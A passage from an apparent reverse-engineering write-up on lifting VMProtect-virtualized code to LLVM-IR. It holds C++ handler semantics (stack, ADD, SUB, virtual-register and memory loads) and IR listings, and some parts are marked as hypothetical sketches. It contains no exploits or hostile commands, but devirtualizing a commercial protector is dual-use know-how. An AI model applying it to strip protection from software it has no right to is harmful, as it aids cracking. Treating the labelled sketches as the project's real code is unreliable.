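  llvm::GlobalVariable *RAM = M->getGlobalVariable("RAM");
  (void)HelperFunction; (void)HelperStub; (void)RAM;
  return M;
}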

The compiled and optimized LLVM-IR code for the described C++ definitions follows:

%struct.VirtualRegister = type { %union.anon }
%union.anon = type { i64 }
%struct.anon = type { i8, i8, i8, i8, i8, i8, i8, i8 }

@RAM = external local_unnamed_addr global [0 x i8], align 1
@GS = external local_unnamed_addr global [0 x i8], align 1
@FS = external local_unnamed_addr global [0 x i8], align 1

declare i64 @HelperStub(i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64, i64, i64, i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), %struct.VirtualRegister*, i64*) local_unnamed_addr

define i64 @HelperFunction(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) local_unnamed_addr {
entry:
  %vmregs = alloca [30 x %struct.VirtualRegister], align 16
  %slots = alloca [30 x i64], align 16
  %vip = alloca i64, align 8
  %0 = bitcast [30 x %struct.VirtualRegister]* %vmregs to i8*
  call void @llvm.memset.p0i8.i64(i8* nonnull align 16 dereferenceable(240) %0, i8 0, i64 240, i1 false)
  %1 = bitcast [30 x i64]* %slots to i8*
  call void @llvm.memset.p0i8.i64(i8* nonnull align 16 dereferenceable(240) %1, i8 0, i64 240, i1 false)
  %2 = bitcast i64* %vip to i8*
  store i64 0, i64* %vip, align 8
  %arraydecay = getelementptr inbounds [30 x %struct.VirtualRegister], [30 x %struct.VirtualRegister]* %vmregs, i64 0, i64 0
  %arraydecay1 = getelementptr inbounds [30 x i64], [30 x i64]* %slots, i64 0, i64 0
  %call = call i64 @HelperStub(i64* nonnull align 8 dereferenceable(8) %rax, i64* nonnull align 8 dereferenceable(8) %rbx, i64* nonnull align 8 dereferenceable(8) %rcx, i64* nonnull align 8 dereferenceable(8) %rdx, i64* nonnull align 8 dereferenceable(8) %rsi, i64* nonnull align 8 dereferenceable(8) %rdi, i64* nonnull align 8 dereferenceable(8) %rbp, i64* nonnull align 8 dereferenceable(8) %rsp, i64* nonnull align 8 dereferenceable(8) %r8, i64* nonnull align 8 dereferenceable(8) %r9, i64* nonnull align 8 dereferenceable(8) %r10, i64* nonnull align 8 dereferenceable(8) %r11, i64* nonnull align 8 dereferenceable(8) %r12, i64* nonnull align 8 dereferenceable(8) %r13, i64* nonnull align 8 dereferenceable(8) %r14, i64* nonnull align 8 dereferenceable(8) %r15, i64* nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 0, i64* nonnull align 8 dereferenceable(8) %rsp, i64* nonnull align 8 dereferenceable(8) %vip, %struct.VirtualRegister* nonnull %arraydecay, i64* nonnull %arraydecay1)
  ret i64 %call
}

Semantics of the handlers

We can now move on to the implementation of the semantics of the handlers used by VMProtect. As mentioned before, implementing them directly at the LLVM-IR level can be a tedious task, so we’ll proceed with the same C++ to LLVM-IR logic adopted in the previous section.

The following selection of handlers should give an idea of the logic adopted to implement the handlers’ semantics.

STACK_PUSH

To access the stack using the push operation, we define a templated helper function that takes the virtual stack pointer and value to push as parameters.

template <typename T> __attribute__((always_inline)) void STACK_PUSH(size_t &vsp, T value) {
  // Update the stack pointer
  vsp -= sizeof(T);
  // Store the value
  std::memcpy(&RAM[vsp], &value, sizeof(T));
}

We can see that the virtual stack pointer is decremented using the byte size of the template parameter. Then we proceed to use the std::memcpy function to execute a safe type punning store operation accessing the RAM array with the virtual stack pointer as index. The C++ implementation is compiled with -O3 optimizations, so the function will be inlined (as expected from the always_inline attribute) and the std::memcpy call will be converted to the proper pointer type cast and store instructions.

STACK_POP

As expected, also the stack pop operation is defined as a templated helper function that takes the virtual stack pointer as parameter and returns the popped value as output.

template <typename T> __attribute__((always_inline)) T STACK_POP(size_t &vsp) {
  // Fetch the value
  T value = 0;
  std::memcpy(&value, &RAM[vsp], sizeof(T));
  // Undefine the stack slot
  T undef = UNDEF<T>();
  std::memcpy(&RAM[vsp], &undef, sizeof(T));
  // Update the stack pointer
  vsp += sizeof(T);
  // Return the value
  return value;
}

We can see that the value is read from the stack using the same std::memcpy logic explained above, an undefined value is written to the current stack slot and the virtual stack pointer is incremented using the byte size of the template parameter. As in the previous case, the -O3 optimizations will take care of inlining and lowering the std::memcpy call.

ADD

Since the virtual machine is a stack machine, we know that the addition handler is going to pop the two input operands from the top of the stack, add them together, calculate the updated flags and push the result and the flags back to the stack. There are four variations of the addition handler, meant to handle 8/16/32/64 bits operands, with the peculiarity that the 8 bits case is really popping 16 bits per operand off the stack and pushing a 16 bits result back to the stack to be consistent with the x64 push/pop alignment rules.

From what we just described the only thing we need is the virtual stack pointer, to be able to access the stack.

// ADD semantic

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool AF(T lhs, T rhs, T res) {
  return AuxCarryFlag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool PF(T res) {
  return ParityFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool ZF(T res) {
  return ZeroFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool SF(T res) {
  return SignFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool CF_ADD(T lhs, T rhs, T res) {
  return Carry<tag_add>::Flag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool OF_ADD(T lhs, T rhs, T res) {
  return Overflow<tag_add>::Flag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
void ADD_FLAGS(size_t &flags, T lhs, T rhs, T res) {
  // Calculate the flags
  bool cf = CF_ADD(lhs, rhs, res);
  bool pf = PF(res);
  bool af = AF(lhs, rhs, res);
  bool zf = ZF(res);
  bool sf = SF(res);
  bool of = OF_ADD(lhs, rhs, res);
  // Update the flags
  UPDATE_EFLAGS(flags, cf, pf, af, zf, sf, of);
}

template <typename T>
__attribute__((always_inline))
void ADD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Initialize the operands
  T op1 = 0;
  T op2 = 0;
  // Fetch the operands
  if (isByte) {
    op1 = Trunc(STACK_POP<uint16_t>(vsp));
    op2 = Trunc(STACK_POP<uint16_t>(vsp));
  } else {
    op1 = STACK_POP<T>(vsp);
    op2 = STACK_POP<T>(vsp);
  }
  // Calculate the add
  T res = UAdd(op1, op2);
  // Calculate the flags
  size_t flags = 0;
  ADD_FLAGS(flags, op1, op2, res);
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(res));
  } else {
    STACK_PUSH<T>(vsp, res);
  }
  // Save the flags
  STACK_PUSH<size_t>(vsp, flags);
}

DEFINE_SEMANTIC_64(ADD_64) = ADD<uint64_t>;
DEFINE_SEMANTIC(ADD_32) = ADD<uint32_t>;
DEFINE_SEMANTIC(ADD_16) = ADD<uint16_t>;
DEFINE_SEMANTIC(ADD_8) = ADD<uint8_t>;

We can see that the function definition is templated with a T parameter that is internally used to generate the properly-sized stack accesses executed by the STACK_PUSH and STACK_POP helpers defined above. Additionally we are taking care of truncating and zero extending the special 8 bits case. Finally, after the unsigned addition took place, we rely on Remill’s semantically proven flag computations to calculate the fresh flags before pushing them to the stack.

The other binary and arithmetic operations are implemented following the same structure, with the correct operands access and flag computations.
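
Purely to illustrate that structure, this is how a subtraction handler can be laid out with the same building blocks; the USub, Carry<tag_sub> and Overflow<tag_sub> helpers are assumed to come from Remill just like their addition counterparts, and the snippet is a sketch rather than one of the handlers actually emitted by the protector.

// SUB semantic (illustrative sketch, mirroring the ADD handler above)

template <typename T>
__attribute__((always_inline))
void SUB_FLAGS(size_t &flags, T lhs, T rhs, T res) {
  // Calculate the flags, using the subtraction variants for carry/overflow
  bool cf = Carry<tag_sub>::Flag(lhs, rhs, res);
  bool pf = PF(res);
  bool af = AF(lhs, rhs, res);
  bool zf = ZF(res);
  bool sf = SF(res);
  bool of = Overflow<tag_sub>::Flag(lhs, rhs, res);
  // Update the flags
  UPDATE_EFLAGS(flags, cf, pf, af, zf, sf, of);
}

template <typename T>
__attribute__((always_inline))
void SUB(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Fetch the operands
  T op1 = 0;
  T op2 = 0;
  if (isByte) {
    op1 = Trunc(STACK_POP<uint16_t>(vsp));
    op2 = Trunc(STACK_POP<uint16_t>(vsp));
  } else {
    op1 = STACK_POP<T>(vsp);
    op2 = STACK_POP<T>(vsp);
  }
  // Calculate the subtraction
  T res = USub(op1, op2);
  // Calculate the flags
  size_t flags = 0;
  SUB_FLAGS(flags, op1, op2, res);
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(res));
  } else {
    STACK_PUSH<T>(vsp, res);
  }
  // Save the flags
  STACK_PUSH<size_t>(vsp, flags);
}

DEFINE_SEMANTIC_64(SUB_64) = SUB<uint64_t>;
DEFINE_SEMANTIC(SUB_32) = SUB<uint32_t>;
DEFINE_SEMANTIC(SUB_16) = SUB<uint16_t>;
DEFINE_SEMANTIC(SUB_8) = SUB<uint8_t>;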

PUSH_VMREG

This handler is meant to fetch the value stored in a VmRegister and push it to the stack. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and the value of the VmRegister. The template is additionally defining the size of the pushed value and the offset from the VmRegister slot base.

template <size_t Size, size_t Offset>
__attribute__((always_inline)) void PUSH_VMREG(size_t &vsp, VirtualRegister vmreg) {
  // Update the stack pointer
  vsp -= ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
  // Select the proper element of the virtual register
  if constexpr (Size == 64) {
    std::memcpy(&RAM[vsp], &vmreg.qword, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d0, sizeof(uint32_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d1, sizeof(uint32_t));
    }
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.word.w0, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.word.w1, sizeof(uint16_t));
    } else if constexpr (Offset == 2) {
      std::memcpy(&RAM[vsp], &vmreg.word.w2, sizeof(uint16_t));
    } else if constexpr (Offset == 3) {
      std::memcpy(&RAM[vsp], &vmreg.word.w3, sizeof(uint16_t));
    }
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = ZExt(vmreg.byte.b0);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      uint16_t byte = ZExt(vmreg.byte.b1);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    }
    // NOTE: there might be other offsets here, but they were not observed
  }
}

DEFINE_SEMANTIC(PUSH_VMREG_8_LOW) = PUSH_VMREG<8, 0>;
DEFINE_SEMANTIC(PUSH_VMREG_8_HIGH) = PUSH_VMREG<8, 1>;
DEFINE_SEMANTIC(PUSH_VMREG_16_LOWLOW) = PUSH_VMREG<16, 0>;
DEFINE_SEMANTIC(PUSH_VMREG_16_LOWHIGH) = PUSH_VMREG<16, 1>;
DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHLOW) = PUSH_VMREG<16, 2>;
DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHHIGH) = PUSH_VMREG<16, 3>;
DEFINE_SEMANTIC_64(PUSH_VMREG_32_LOW) = PUSH_VMREG<32, 0>;
DEFINE_SEMANTIC_32(PUSH_VMREG_32) = PUSH_VMREG<32, 0>;
DEFINE_SEMANTIC_64(PUSH_VMREG_32_HIGH) = PUSH_VMREG<32, 1>;
DEFINE_SEMANTIC_64(PUSH_VMREG_64) = PUSH_VMREG<64, 0>;

We can see how the proper VmRegister sub-chunk is accessed based on the size and offset template parameters (e.g. vmreg.word.w1, vmreg.qword) and how once again the std::memcpy is used to implement a safe memory write on the indexed RAM array. The virtual stack pointer is also decremented as usual.

POP_VMREG

This handler is meant to pop a value from the stack and store it into a VmRegister. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and a reference to the VmRegister to be updated. As before the template is defining the size of the popped value and the offset into the VmRegister slot.

template <size_t Size, size_t Offset>
__attribute__((always_inline)) void POP_VMREG(size_t &vsp, VirtualRegister &vmreg) {
  // Fetch and store the value on the virtual register
  if constexpr (Size == 64) {
    uint64_t value = 0;
    std::memcpy(&value, &RAM[vsp], sizeof(uint64_t));
    vmreg.qword = value;
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF00000000) | value);
    } else if constexpr (Offset == 1) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0x00000000FFFFFFFF) | UShl(ZExt(value), 32));
    }
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFFFFFF0000) | value);
    } else if constexpr (Offset == 1) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF0000FFFF) | UShl(ZExtTo<uint64_t>(value), 16));
    } else if constexpr (Offset == 2) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFF0000FFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 32));
    } else if constexpr (Offset == 3) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0x0000FFFFFFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 48));
    }
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b0 = Trunc(byte);
    } else if constexpr (Offset == 1) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b1 = Trunc(byte);
    }
    // NOTE: there might be other offsets here, but they were not observed
  }
  // Clear the value on the stack
  if constexpr (Size == 64) {
    uint64_t undef = UNDEF<uint64_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    uint32_t undef = UNDEF<uint32_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint32_t));
  } else if constexpr (Size == 16) {
    uint16_t undef = UNDEF<uint16_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint16_t));
  } else if constexpr (Size == 8) {
    uint16_t undef = UNDEF<uint16_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint16_t));
  }
  // Update the stack pointer
  vsp += ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
}

DEFINE_SEMANTIC(POP_VMREG_8_LOW) = POP_VMREG<8, 0>;
DEFINE_SEMANTIC(POP_VMREG_8_HIGH) = POP_VMREG<8, 1>;
DEFINE_SEMANTIC(POP_VMREG_16_LOWLOW) = POP_VMREG<16, 0>;
DEFINE_SEMANTIC(POP_VMREG_16_LOWHIGH) = POP_VMREG<16, 1>;
DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHLOW) = POP_VMREG<16, 2>;
DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHHIGH) = POP_VMREG<16, 3>;
DEFINE_SEMANTIC_64(POP_VMREG_32_LOW) = POP_VMREG<32, 0>;
DEFINE_SEMANTIC_64(POP_VMREG_32_HIGH) = POP_VMREG<32, 1>;
DEFINE_SEMANTIC_64(POP_VMREG_64) = POP_VMREG<64, 0>;

In this case we can see that the update operation on the sub-chunks of the VmRegister is being done with some masking, shifting and zero extensions. This is to help LLVM with merging smaller integer values into a bigger integer value, whenever possible. As we saw in the STACK_POP operation, we are writing an undefined value to the current stack slot. Finally we are incrementing the virtual stack pointer.

LOAD and LOAD_GS

Generically speaking the LOAD handler is meant to pop an address from the stack, dereference it to load a value from one of the program segments and push the retrieved value to the top of the stack.

The following C++ snippet shows the implementation of a memory load from a generic memory pointer (e.g. SS or DS segments) and from the GS segment:

template <typename T> __attribute__((always_inline)) void LOAD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Pop the address
  size_t address = STACK_POP<size_t>(vsp);
  // Load the value
  T value = 0;
  std::memcpy(&value, &RAM[address], sizeof(T));
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(value));
  } else {
    STACK_PUSH<T>(vsp, value);
  }
}

DEFINE_SEMANTIC_64(LOAD_SS_64) = LOAD<uint64_t>;
DEFINE_SEMANTIC(LOAD_SS_32) = LOAD<uint32_t>;
DEFINE_SEMANTIC(LOAD_SS_16) = LOAD<uint16_t>;
DEFINE_SEMANTIC(LOAD_SS_8) = LOAD<uint8_t>;

DEFINE_SEMANTIC_64(LOAD_DS_64) = LOAD<uint64_t>;
DEFINE_SEMANTIC(LOAD_DS_32) = LOAD<uint32_t>;
DEFINE_SEMANTIC(LOAD_DS_16) = LOAD<uint16_t>;
DEFINE_SEMANTIC(LOAD_DS_8) = LOAD<uint8_t>;

template <typename T> __attribute__((always_inline)) void LOAD_GS(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Pop the address
  size_t address = STACK_POP<size_t>(vsp);
  // Load the value
  T value = 0;
  std::memcpy(&value, &GS[address], sizeof(T));
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(value));
  } else {
    STACK_PUSH<T>(vsp, value);
  }
}

DEFINE_SEMANTIC_64(LOAD_GS_64) = LOAD_GS<uint64_t>;
DEFINE_SEMANTIC(LOAD_GS_32) = LOAD_GS<uint32_t>;
DEFINE_SEMANTIC(LOAD_GS_16) = LOAD_GS<uint16_t>;
DEFINE_SEMANTIC(LOAD_GS_8) = LOAD_GS<uint8_t>;

By now the process should be clear. The only difference is the accessed zero-length array that will end up as the base of the getelementptr instruction, which will directly reflect on the aliasing information that LLVM will be able to infer. The same kind of logic is applied to all the read or write memory accesses to the different segments.

DEFINE_SEMANTIC

In the code snippets of this section you may have noticed three macros named DEFINE_SEMANTIC_64, DEFINE_SEMANTIC_32 and DEFINE_SEMANTIC. They are the umpteenth trick borrowed from Remill and are meant to generate global variables with unmangled names, pointing to the function definition of the specialized template handlers. As an example, the ADD semantic definition for the 8/16/32/64 bits cases looks like this at the LLVM-IR level:

@SEM_ADD_64 = dso_local constant void (i64*)* @_Z3ADDIyEvRm, align 8
@SEM_ADD_32 = dso_local constant void (i64*)* @_Z3ADDIjEvRm, align 8
@SEM_ADD_16 = dso_local constant void (i64*)* @_Z3ADDItEvRm, align 8
@SEM_ADD_8 = dso_local constant void (i64*)* @_Z3ADDIhEvRm, align 8
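
For illustration, the following is a minimal sketch of how such macros could look; the macro bodies are an assumption derived from the described behavior and the IR above, not the code used by the project.

// Hypothetical sketch of the DEFINE_SEMANTIC macros (assumed shape). Each
// macro emits a constant global with an unmangled "SEM_"-prefixed name that
// holds the address of the specialized template handler, so the handler can
// be looked up by name in the compiled LLVM-IR module.
#define DEFINE_SEMANTIC(name) \
  extern "C" const auto SEM_##name __attribute__((used))
// In this sketch the 32/64-bit variants are assumed to be enabled only when
// lifting code of the matching bitness.
#define DEFINE_SEMANTIC_32(name) DEFINE_SEMANTIC(name)
#define DEFINE_SEMANTIC_64(name) DEFINE_SEMANTIC(name)

// Example expansion:
//   DEFINE_SEMANTIC(ADD_32) = ADD<uint32_t>;
//   -> extern "C" const auto SEM_ADD_32 __attribute__((used)) = ADD<uint32_t>;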

UNDEF

In the code snippets of this section you may also have noticed the usage of a function called UNDEF. This function is used to store a fictitious __undef value after each pop from the stack, signaling to LLVM that the popped value is no longer needed.

The __undef value is modeled as a global variable, which during the first phase of the optimization pipeline will be used by passes like DSE to kill overlapping post-dominated dead stores; it’ll then be replaced with a real undef value near the end of the optimization pipeline, so that the related store instructions are gone in the final optimized LLVM-IR function.
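
A minimal sketch of how the UNDEF helper could be implemented follows, assuming the __undef global described above; it is an illustration of the idea rather than the actual project code.

// Hypothetical sketch: reading the fictitious global yields a value whose
// stores DSE can kill, and a late pass can swap the global with a real
// 'undef' at the LLVM-IR level.
extern "C" size_t __undef;

template <typename T>
__attribute__((always_inline)) T UNDEF() {
  return static_cast<T>(__undef);
}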

Lifting a basic block

We now have a bunch of templates, structures and helper functions, but how do we actually end up lifting some virtualized code?

The high level idea is the following:

  • A new LLVM-IR function with the HelperStub signature is generated;
  • The function’s body is populated with call instructions to the VmHandler helper functions fed with the proper arguments (obtained from the HelperStub parameters);
  • The optimization pipeline is executed on the function, resulting in the inlining of all the helper functions (that are marked always_inline) and in the propagation of the values;
  • The updated state of the VmRegisters, VmPassingSlots and stores to the segments is optimized, removing most of the obfuscation patterns used by VMProtect;
  • The updated state of the virtual stack pointer and virtual instruction pointer is computed.

A fictitious example of a full pipeline based on the HelperStub function, implemented at the C++ level and optimized to obtain propagated LLVM-IR code follows:

extern "C" __attribute__((always_inline)) size_t SimpleExample_HelperStub(
  rptr rax, rptr rbx, rptr rcx,
  rptr rdx, rptr rsi, rptr rdi,
  rptr rbp, rptr rsp, rptr r8,
  rptr r9, rptr r10, rptr r11,
  rptr r12, rptr r13, rptr r14,
  rptr r15, rptr flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR, rptr vsp,
  rptr vip, VirtualRegister *__restrict__ vmregs,
  size_t *__restrict__ slots) {

  PUSH_REG(vsp, rax);
  PUSH_REG(vsp, rbx);
  POP_VMREG<64, 0>(vsp, vmregs[1]);
  POP_VMREG<64, 0>(vsp, vmregs[0]);
  PUSH_VMREG<64, 0>(vsp, vmregs[0]);
  PUSH_VMREG<64, 0>(vsp, vmregs[1]);
  ADD<uint64_t>(vsp);
  POP_VMREG<64, 0>(vsp, vmregs[2]);
  POP_VMREG<64, 0>(vsp, vmregs[3]);
  PUSH_VMREG<64, 0>(vsp, vmregs[3]);
  POP_REG(vsp, rax);

  return vip;
}

The C++ HelperStub function with calls to the handlers. This only serves as an example; normally the LLVM-IR for this is generated automatically from the VM bytecode.

define dso_local i64 @SimpleExample_HelperStub(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR, i64* noalias nonnull align 8 dereferenceable(8) %vsp, i64* noalias nonnull align 8 dereferenceable(8) %vip, %struct.VirtualRegister* noalias %vmregs, i64* noalias %slots) local_unnamed_addr {
entry:
  %rax.addr = alloca i64*, align 8
  %rbx.addr = alloca i64*, align 8
  %rcx.addr = alloca i64*, align 8
  %rdx.addr = alloca i64*, align 8
  %rsi.addr = alloca i64*, align 8
  %rdi.addr = alloca i64*, align 8
  %rbp.addr = alloca i64*, align 8
  %rsp.addr = alloca i64*, align 8
  %r8.addr = alloca i64*, align 8
  %r9.addr = alloca i64*, align 8
  %r10.addr = alloca i64*, align 8
  %r11.addr = alloca i64*, align 8
  %r12.addr = alloca i64*, align 8
  %r13.addr = alloca i64*, align 8
  %r14.addr = alloca i64*, align 8
  %r15.addr = alloca i64*, align 8
  %flags.addr = alloca i64*, align 8
  %KEY_STUB.addr = alloca i64, align 8
  %RET_ADDR.addr = alloca i64, align 8
  %REL_ADDR.addr = alloca i64, align 8
  %vsp.addr = alloca i64*, align 8
  %vip.addr = alloca i64*, align 8
  %vmregs.addr = alloca %struct.VirtualRegister*, align 8
  %slots.addr = alloca i64*, align 8
  %agg.tmp = alloca %struct.VirtualRegister, align 1
  %agg.tmp4 = alloca %struct.VirtualRegister, align 1
  %agg.tmp10 = alloca %struct.VirtualRegister, align 1
  store i64* %rax, i64** %rax.addr, align 8
  store i64* %rbx, i64** %rbx.addr, align 8
  store i64* %rcx, i64** %rcx.addr, align 8
  store i64* %rdx, i64** %rdx.addr, align 8
  store i64* %rsi, i64** %rsi.addr, align 8
  store i64* %rdi, i64** %rdi.addr, align 8
  store i64* %rbp, i64** %rbp.addr, align 8
  store i64* %rsp, i64** %rsp.addr, align 8
  store i64* %r8, i64** %r8.addr, align 8
  store i64* %r9, i64** %r9.addr, align 8
  store i64* %r10, i64** %r10.addr, align 8
  store i64* %r11, i64** %r11.addr, align 8
  store i64* %r12, i64** %r12.addr, align 8
  store i64* %r13, i64** %r13.addr, align 8
  store i64* %r14, i64** %r14.addr, align 8
  store i64* %r15, i64** %r15.addr, align 8
  store i64* %flags, i64** %flags.addr, align 8
  store i64 %KEY_STUB, i64* %KEY_STUB.addr, align 8
  store i64 %RET_ADDR, i64* %RET_ADDR.addr, align 8
  store i64 %REL_ADDR, i64* %REL_ADDR.addr, align 8
  store i64* %vsp, i64** %vsp.addr, align 8
  store i64* %vip, i64** %vip.addr, align 8
  store %struct.VirtualRegister* %vmregs, %struct.VirtualRegister** %vmregs.addr, align 8
  store i64* %slots, i64** %slots.addr, align 8
  %0 = load i64*, i64** %vsp.addr, align 8
  %1 = load i64*, i64** %rax.addr, align 8
  %2 = load i64, i64* %1, align 8
  call void @_Z8PUSH_REGRmm(i64* nonnull align 8 dereferenceable(8) %0, i64 %2)
  %3 = load i64*, i64** %vsp.addr, align 8
  %4 = load i64*, i64** %rbx.addr, align 8
  %5 = load i64, i64* %4, align 8
  call void @_Z8PUSH_REGRmm(i64* nonnull align 8 dereferenceable(8) %3, i64 %5)
  %6 = load i64*, i64** %vsp.addr, align 8
  %7 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %7, i64 1
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %6, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx)
  %8 = load i64*, i64** %vsp.addr, align 8
  %9 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx1 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %9, i64 0
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %8, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx1)
  %10 = load i64*, i64** %vsp.addr, align 8
  %11 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx2 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %11, i64 0
  %12 = bitcast %struct.VirtualRegister* %agg.tmp to i8*
  %13 = bitcast %struct.VirtualRegister* %arrayidx2 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %12, i8* align 1 %13, i64 8, i1 false)
  %coerce.dive = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp, i32 0, i32 0
